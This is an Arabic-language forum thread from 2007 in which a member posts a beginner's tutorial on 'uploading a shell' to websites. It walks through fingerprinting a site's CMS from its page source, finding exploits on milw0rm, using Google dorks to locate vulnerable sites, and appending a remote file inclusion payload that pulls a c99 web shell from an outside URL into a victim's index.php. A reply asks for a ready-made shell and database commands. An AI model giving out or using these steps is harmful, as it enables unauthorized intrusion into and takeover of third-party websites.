 |
 |
 |
 |
 |
|
 |
|
 |
 |
|
|
 |
 |
 |
 |
 |
| | | | | |
|
|||||||
| التسجيل | مركز تحميل برق | قائمة الأعضاء | التقويم | البحث | مشاركات اليوم | اجعل كافة الأقسام مقروءة |
| الحماية من الهكر و الاختراق حماية موقعك حماية بريدك من الهكر حماية ايميلك يمنع نهائيا نشر اي موضوع اختراق او فيه ضرر على المسلمين مهما كانت نيته |
 |
|
|
LinkBack | أدوات الموضوع | إبحث في الموضوع |
11-18-2007, 10:49 PM
|
#1 | |||||
|
-||[عضو منــورنـا]||-
معدل تقييم المستوى: 0
 |
كيفية رفع الشل للمبتدأين
السلام عليكم اما بعد
اليوم رايح اشرحلكم بساطت رفع شيل على موقع وكيف يتم ذالك طبعا نحن دايم نسمع اختراق عن طريق ثغره رفع شيل صفحت اندكس موجوده على احد المواقع لكن كيف يتم كل هذا . انته يالمبتداء دايم تروح تدور في المنتديات الهكرز تحاول تتعلم تخترق موقع وتعتقد انه اكتشاف الثغرات شي صعب بس اقولك انه شي سهل الحين رايح نتعلم الاختراق العشوائي والأستهداف. في عندنا طريقه سهله لختراق المواقع نفترض انك تريد تخترق هذا الموقع www.xxx.com بس ويش تسوي على شان تعرف ثغرات بسرعه اقولك انه سهل جدا شوف فوق عندك في المتصفح بتلاقي هذي الايقونات file edit view وايقونات ثانيه انته اضغط على view بعدين اختار source رايح يطلعلك كلام بلانجليزي هذا كود صفحت الموقع ويش نريد منه الي نريده سكربت الموقع او اي سكربت يستخدمه الموقع مثل سكربت الستايل شوف هذي العباره في الكود <****** type="text/java******"> <!-- // Main vBulletin Java****** Initialization vBulletin_init(); //--> </******> تقول ويش اسوي فيه ؟ ويش تسوي فيه طبعا نحن نريد سكربت يستخدمه الموقع ناخذ هذا مثلا من العباره vBulletin Java****** Initialization ناخذه ونطير على هذا الموقع وهوه واحد من مواقع السكيرتي http://www.milw0rm.com بعد ماندخله نروح الى قائمة البحث ونحط اسم السكربت ورايح تطلع لنا اخر الثغرات. بس اول شي لازم نعرف كيف نستخدم هذا الموقع في الأطار الي نريده نبدا بلأختراق العشوائي. ادخل هنا طبعا في الموقع [ web apps ] طبعا رايح تطلع لنا كثير ثغرات مثلا ناخذ هذي http://www.milw0rm.com/exploits/4221 طبعا نحن الي يهمنى الاستغلال وكود البحث في جوجل شوف هنا هذا أكواد البحث في جوجل dork:inurl:index.php%"Submit%Articles"%"Member%Log in"%"Top%Authors" dork:inurl:index.php?pagedb=rss هذي الكلمه drok هي تعني كود البحث اما هنا expl:index.php?page=****l? فهذا الاستغلال expl تعني استغلال الثغره الحين نجي للاختراق افتح جوجل ونختار كود البحث هذا inurl:index.php?pagedb=rss رايح تطلع لنا مواقع كثيره اختر واحد بعدين حط الاستغلال الي هوه index.php?page=****l؟ كلمة شيل تعني رابط الشيل الي تستخدمه مثلا هذا رابط تشيل http://casavie.net/hack/c99.txt? جيب موقع الضحيه الي هوه www.xxx.com وحط وراه الاتسغلال يعني يصير كذا http://www.xxx.com\index.php?=http:/.../hack/c99.txt? طبعلا لاتنسى الاستفهام بعد رابط الشيل وطبعا كذا يتم رفع شيل عن طريقاستغلال ثغره . 
|
|||||
|
|
|
07-06-2008, 06:06 AM
|
#3 |
|
عضو بانتظار التفعيل
معدل تقييم المستوى: 0
|
السلام عليكم اولا ما تلاحظ مرة طولتها وعمر المبتدء ما يتعلم من كثر المتاهات  نزل نسخه شل مستهلكه ورابط قاعدة البيانات والوامر لقاعدة البياتات اسهل كثير مافيها طولت شرح وبسرعه انشاء الله يتعلم  good bay
|
|
|
|
|
| أدوات الموضوع | إبحث في الموضوع |
|
|
 |
